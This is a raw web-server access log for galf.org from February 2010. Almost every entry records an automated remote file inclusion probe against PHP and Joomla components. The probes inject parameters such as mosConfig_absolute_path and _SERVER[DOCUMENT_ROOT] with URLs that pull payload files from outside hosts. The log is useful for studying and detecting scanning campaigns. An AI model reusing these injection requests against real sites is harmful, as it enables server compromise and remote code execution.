218.38.136.125 - - [08/Feb/2010:01:26:13 -0800] "GET /logs/access_091019.log%20%20/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [08/Feb/2010:01:26:23 -0800] "GET /logs/access_090928.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:27:13 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:27:17 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:27:18 -0800] "GET /logs/access_100118.log///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [08/Feb/2010:01:27:59 -0800] "GET /logs/access_090928.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:28:34 -0800] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:28:49 -0800] "GET /logs/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:28:49 -0800] "GET /logs/access_091019.log%20%20/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [08/Feb/2010:01:28:51 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://musicadelibreria.net/footer? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [08/Feb/2010:01:28:51 -0800] "GET /logs/access_091012.log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://musicadelibreria.net/footer? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [08/Feb/2010:01:28:51 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://musicadelibreria.net/footer? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:01:29:38 -0800] "GET /logs/access_100118.log//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:01:29:50 -0800] "GET /logs/access_100201.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.226.134.29 - - [08/Feb/2010:01:31:11 -0800] "GET /logs/access_100201.log/delete_all.php?board_skin_path=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:01:31:39 -0800] "GET /logs/access_090727.log//faqsupport/samplefaqsupport.php?path[docroot]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:01:31:39 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:01:31:39 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [08/Feb/2010:01:31:39 -0800] "GET /logs/access_091221.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:31:42 -0800] "GET /logs/access.log%20%20/////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
121.88.4.141 - - [08/Feb/2010:01:32:17 -0800] "GET /logs/access_100118.log///amboard/?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [08/Feb/2010:01:32:17 -0800] "GET /logs///amboard/?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [08/Feb/2010:01:32:17 -0800] "GET //amboard/?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [08/Feb/2010:01:33:18 -0800] "GET /logs/access_091221.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [08/Feb/2010:01:33:30 -0800] "GET /logs/access_090928.log///amboard/?_SERVER[DOCUMENT_ROOT]=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:34:52 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:34:52 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:34:52 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:35:22 -0800] "GET /bbs//skin/zero_vote/ask_password.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:35:22 -0800] "GET /logs/bbs//skin/zero_vote/ask_password.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:35:22 -0800] "GET /logs/access_091116.log/bbs//skin/zero_vote/ask_password.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:35:22 -0800] "GET /logs/access_090713.log/bbs//skin/zero_vote/ask_password.php?dir=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:36:00 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:36:00 -0800] "GET /logs/access_090720.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:36:00 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
67.195.112.161 - - [08/Feb/2010:01:36:34 -0800] "GET /robots.txt HTTP/1.0" 404 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:37:36 -0800] "GET //lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:37:36 -0800] "GET /logs/access_100125.log%20%20///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:37:43 -0800] "GET /logs///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [08/Feb/2010:01:38:25 -0800] "GET /logs/access.log%20%20////appserv/main.php?appserv_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [08/Feb/2010:01:38:25 -0800] "GET ///appserv/main.php?appserv_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.141 - - [08/Feb/2010:01:38:25 -0800] "GET /logs////appserv/main.php?appserv_root=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [08/Feb/2010:01:39:04 -0800] "GET /logs/access_100118.log%20%20//index.php?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [08/Feb/2010:01:39:10 -0800] "GET /logs/access.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [08/Feb/2010:01:39:10 -0800] "GET /logs/access_100201.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:39:24 -0800] "GET /logs/access_100118.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:39:24 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:39:24 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [08/Feb/2010:01:39:31 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [08/Feb/2010:01:39:31 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [08/Feb/2010:01:39:31 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.59.163.57 - - [08/Feb/2010:01:39:57 -0800] "GET /logs/access_090713.log//modules/My_eGallery/public/displayCategory.php?basepath=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
209.59.163.57 - - [08/Feb/2010:01:39:58 -0800] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
209.59.163.57 - - [08/Feb/2010:01:39:59 -0800] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://tottinoz.interfree.it/echos.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:40:24 -0800] "GET //lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:40:24 -0800] "GET /logs/access_100125.log%20%20///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:40:29 -0800] "GET /logs/access_091228.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:40:31 -0800] "GET /logs///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [08/Feb/2010:01:40:38 -0800] "GET /logs/access_100201.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.50.85.229 - - [08/Feb/2010:01:40:38 -0800] "GET /logs/access.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:40:41 -0800] "GET /logs/access_091228.log/skin/ggambo1100_gallery/setup.php?setup[use_category]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [08/Feb/2010:01:40:46 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [08/Feb/2010:01:40:46 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.172.33.230 - - [08/Feb/2010:01:40:46 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://downloadgogo.com/osCommerce/catalog/images/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:41:26 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:41:34 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:41:34 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:41:34 -0800] "GET /logs/access_090727.log//faqsupport/samplefaqsupport.php?path[docroot]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [08/Feb/2010:01:42:34 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [08/Feb/2010:01:42:34 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
203.251.80.167 - - [08/Feb/2010:01:42:34 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:01:42:36 -0800] "GET /logs/access_100118.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:01:42:36 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
69.163.202.84 - - [08/Feb/2010:01:42:36 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:43:18 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:43:18 -0800] "GET /include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:43:18 -0800] "GET /logs/access_090720.log%20%20//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:43:23 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:43:23 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:43:23 -0800] "GET /logs/access_090817.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:43:37 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:43:37 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:43:37 -0800] "GET /logs/access_090720.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:43:38 -0800] "GET /logs/access_090803.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:44:39 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:44:39 -0800] "GET /logs/access_090720.log%20%20//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:44:39 -0800] "GET /include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:44:39 -0800] "GET /include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:44:39 -0800] "GET /logs/access_090720.log%20%20//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:44:39 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:44:41 -0800] "GET /logs/access_100125.log%20%20///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:44:41 -0800] "GET //lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:45:01 -0800] "GET /logs///lostpasswd.php?env[include_prefix]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:45:09 -0800] "GET /faqsupport/samplefaqsupport.php?path[docroot]=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:45:09 -0800] "GET /logs/access_100104.log%20%20//faqsupport/samplefaqsupport.php?path[docroot]=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:45:09 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:45:14 -0800] "GET /logs/access_100118.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:45:14 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:45:14 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:45:31 -0800] "GET /include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:45:31 -0800] "GET /logs/access_090720.log%20%20//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:45:31 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:45:43 -0800] "GET ////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:45:56 -0800] "GET /logs/////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.125 - - [08/Feb/2010:01:46:05 -0800] "GET /logs/access_100118.log%20%20/////skin/ggambo7002_board/comment_modify.php?dir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:46:11 -0800] "GET /include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:46:11 -0800] "GET /logs//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:46:11 -0800] "GET /logs/access_090720.log%20%20//include/bbs.lib.inc.php?site_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
74.208.14.52 - - [08/Feb/2010:01:47:18 -0800] "GET /logs/access_090720.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.bio2.pe.kr/bbs/imgs/baner.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:47:53 -0800] "GET /logs/access_100118.log%20%20////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:47:53 -0800] "GET ///?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 1049 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.126 - - [08/Feb/2010:01:47:53 -0800] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 200 4949 "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:48:10 -0800] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:48:10 -0800] "GET /logs///components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
81.176.226.164 - - [08/Feb/2010:01:48:10 -0800] "GET /logs/access_090720.log///components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [08/Feb/2010:01:48:39 -0800] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cmhaniagara.ca/video/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [08/Feb/2010:01:48:40 -0800] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cmhaniagara.ca/video/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
64.235.54.152 - - [08/Feb/2010:01:48:40 -0800] "GET /logs/access_090720.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.cmhaniagara.ca/video/baner.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
221.143.40.35 - - [08/Feb/2010:01:48:45 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_p%20%20%20ath=http://200.199.242.22/images/.ajim/ajim1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
